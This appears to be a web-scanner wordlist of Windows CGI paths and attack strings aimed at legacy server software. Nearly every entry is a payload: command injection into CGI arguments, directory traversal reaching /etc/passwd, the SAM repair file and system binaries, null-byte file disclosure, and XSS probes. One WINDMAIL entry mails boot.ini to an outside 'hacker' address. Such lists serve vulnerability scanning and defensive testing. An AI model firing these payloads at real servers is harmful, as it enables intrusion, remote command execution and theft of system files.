# on windows, cgi dir is usually /scripts /cgi /cgi-bin, but could be named anything or be the webroot. cart32.exe get32.exe visadmin.exe foxweb.exe webplus.exe?about fpsrvadm.exe MsmMask.exe cmd.exe?/c+dir cmd1.exe?/c+dir post32.exe|dir%20c:\\ cgitest.exe hpnst.exe?c=p+i= Pbcgi.exe testcgi.exe webfind.exe?keywords=01234567890123456789 redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C test-cgi.exe? athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[[' mkilog.exe mkplog.exe MsmMask.exe?mask=/junk334 perl.exe?-v perl.exe ppdscgi.exe c32web.exe/ChangeAdminPassword windmail.exe dbmlparser.exe cgimail.exe minimal.exe rguest.exe visitor.exe webbbs.exe wguest.exe /_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15 cfgwiz.exe Cgitest.exe mailform.exe post16.exe imagemap.exe htimage.exe/path/filename?2,2 htimage.exe Webnews.exe texis.exe/junk apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/ sensepost.exe?/c+dir testcgi.exe? ion-p.exe?page=c:\winnt\repair\sam ../../../../../../../../../../WINNT/system32/ipconfig.exe NUL/../../../../../../../../../WINNT/system32/ipconfig.exe PRN/../../../../../../../../../WINNT/system32/ipconfig.exe c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf foxweb.dll wconsole.dll shtml.dll scripts/slxweb.dll/getfile?type=Library&file=[invalid filename] rightfax/fuwww.dll/? WINDMAIL.EXE?%20-n%20c:\boot.ini% WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\ GW5/GWWEB.EXE GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA GW5/GWWEB.EXE?HELP=bad-request GWWEB.EXE?HELP=bad-request echo.bat echo.bat?&dir+c:\\ hello.bat?&dir+c:\\ input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ input2.bat?|dir input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ test-cgi.bat test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\, _layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X